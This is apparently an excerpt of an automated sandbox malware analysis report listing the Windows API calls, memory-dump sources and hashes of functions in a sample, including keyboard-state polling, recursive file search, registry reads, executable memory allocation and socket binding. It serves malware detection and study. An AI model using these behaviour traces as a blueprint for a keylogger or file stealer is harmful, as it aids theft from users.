                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: 2cea84d6942c17fd95f07d30ca05f14034a32b7d289c4b6607b79aebc2f9a22d
                                                                                                                                                                            • Instruction ID: 96febbec240b5fd27af5acc5a6247067dd3efeae202367041d9b0918efa6731c
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cea84d6942c17fd95f07d30ca05f14034a32b7d289c4b6607b79aebc2f9a22d
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DE0B675404B22CFC3314F1AE844412FBF4FFD23623208A2ED4E582660D3B4588ACB60
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01195000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 8e2c7e5428f3769d99874f9f48a7d43ecd37ab7167271737764fc393b28794c6
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e2c7e5428f3769d99874f9f48a7d43ecd37ab7167271737764fc393b28794c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602090695.0000000001142000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602038320.00000000010FC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b9932ecae974c3abbfcba55ead02637814f337ad9cab06edbc66c8e4f7ad1ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212
                                                                                                                                                                            Function 01195118 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01193000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                                                                                            • Instruction ID: 787c18b92c7533cf38c0def7a3ef94175e284761f8f2a9835a9e0a052a0d64e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                                                                                            • Instruction Fuzzy Hash: 22D0A9B02C430236EB8A7BA04C03F287982AB60B4AF4008A5B324380E0C6AA84080212

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 008CA0FA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 008CA11B
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 008CA176
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA181
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 008CA19D
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008CA1ED
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00917B94), ref: 008CA20B
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 008CA215
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA222
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 008CA232
                                                                                                                                                                              • Part of subcall function 008BE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008BE2C9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                            • Opcode ID: 35f7d83c582c8089f3cff4671ab512aa460d0318c2dc119b926313ee2baff563
                                                                                                                                                                            • Instruction ID: 25a673ab282eafefcfdffc214016741adf3a79cdc7d554010adb41eb14b4aca4
                                                                                                                                                                            • Opcode Fuzzy Hash: 35f7d83c582c8089f3cff4671ab512aa460d0318c2dc119b926313ee2baff563
                                                                                                                                                                            • Instruction Fuzzy Hash: 0631F37160431E6ACB14ABA4EC48EEE73BCFF05328F104159E815E6190EB76DA89CA51
                                                                                                                                                                            Function 008DC7A3 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC89D
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 008DC908
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DC92C
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008DC98B
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008DCA46
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCAB3
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCB48
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 008DCB99
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCC42
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DCCE1
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DCCEE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                            • Opcode ID: f755f308326c6882948fc00e7431ef6c3ec02a3740a9a9050e39e5b622f52202
                                                                                                                                                                            • Instruction ID: 98c12ba2146b9c0a22bcb6edca2eaa645adc1c2bd81b809a4c20ed6af663a6eb
                                                                                                                                                                            • Opcode Fuzzy Hash: f755f308326c6882948fc00e7431ef6c3ec02a3740a9a9050e39e5b622f52202
                                                                                                                                                                            • Instruction Fuzzy Hash: E1024E716042419FC714DF28C495E2ABBE5FF48318F18859EE94ACB3A2DB31ED46CB52
                                                                                                                                                                            Function 008BA54A Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 008BA572
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 008BA5F3
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 008BA60E
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 008BA628
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 008BA63D
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 008BA655
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 008BA667
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 008BA67F
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 008BA691
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 008BA6A9
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 008BA6BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                                                                                                                                            • Instruction ID: 78e63cadf83739a46397b9262a8349cac2833e64f438e45822d38c5287938973
                                                                                                                                                                            • Opcode Fuzzy Hash: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 084195A45087C96EFF394B6088143E5BFA0FB22344F088059D5C6DA3C1EB94DED88B53
                                                                                                                                                                            Function 008D4089 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32 ref: 008D40D1
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008D40DC
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008F0B44,?), ref: 008D4136
                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 008D41A9
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 008D4241
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008D4293
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                            • Opcode ID: 783238289f213b83a79ef208e29eee93f60a7144d94941e1d73517712b86dc6c
                                                                                                                                                                            • Instruction ID: ad8703510fc80ed3b7a2d50700a90012117ec3b362d00d3197865985369f1b8f
                                                                                                                                                                            • Opcode Fuzzy Hash: 783238289f213b83a79ef208e29eee93f60a7144d94941e1d73517712b86dc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B6159712043019FC711DF64D889BAABBE4FF89754F100A1AF985DB391DB70E988CB92
                                                                                                                                                                            Function 008CA488 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008CA4D5
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008CA5E8
                                                                                                                                                                              • Part of subcall function 008C41CE: GetInputState.USER32 ref: 008C4225
                                                                                                                                                                              • Part of subcall function 008C41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C42C0
                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008CA505
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008CA5D2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                            • Opcode ID: 68d6c948fd1ce911100aac604d984ed1f41110514d7fa11c0143bc7dc96cff7e
                                                                                                                                                                            • Instruction ID: 5f09169f1bf1c5f8b67ea7c4fff7023e62e19758ecdbdadfaff5cce2778adc2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6c948fd1ce911100aac604d984ed1f41110514d7fa11c0143bc7dc96cff7e
                                                                                                                                                                            • Instruction Fuzzy Hash: CF415D7190020E9BCF14DFA4C849EEEBBB4FF15319F24805AE805E6191E775DE88CB52
                                                                                                                                                                            Function 0085225D Relevance: 7.8, APIs: 5, Instructions: 309COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 008522EE
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 008523C3
                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 008523D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                            • Opcode ID: ae1ac3f06bb8e2120d411b504b3eec89b79aa9d4d6b0d44560ebfa89301a19ce
                                                                                                                                                                            • Instruction ID: 3251724723e95d4f177139ed87c2fca80a501c4ef7bdd95aa478be0cdcc75ebc
                                                                                                                                                                            • Opcode Fuzzy Hash: ae1ac3f06bb8e2120d411b504b3eec89b79aa9d4d6b0d44560ebfa89301a19ce
                                                                                                                                                                            • Instruction Fuzzy Hash: E5813AF0204058BEEA39763D8C99EBF254DFB4330AF180129F942D96A5CE598F09D236
                                                                                                                                                                            Function 008D2163 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008D39AB: inet_addr.WSOCK32(?), ref: 008D39D7
                                                                                                                                                                              • Part of subcall function 008D39AB: _wcslen.LIBCMT ref: 008D39F8
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008D21BA
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D21E1
                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 008D2238
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D2243
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 008D2272
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                            • Opcode ID: 76aac888592c1423308b0f6a13781067eacc653d6e79aeac7b11877d0e472f04
                                                                                                                                                                            • Instruction ID: 116d68a61032cd27b9ffb4ff467ba5d40313694ff46849eefd276dcc45ec8bcf
                                                                                                                                                                            • Opcode Fuzzy Hash: 76aac888592c1423308b0f6a13781067eacc653d6e79aeac7b11877d0e472f04
                                                                                                                                                                            • Instruction Fuzzy Hash: E551B171600210AFDB10AF68C886F2A77E5FB55718F088199F915EF393C771AD45CBA2
                                                                                                                                                                            Function 008E25A0 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                            • Opcode ID: 2ff3ad4169cebd35ad2d3b27d8413cf78682b09974a7d8d0701cd38090f47456
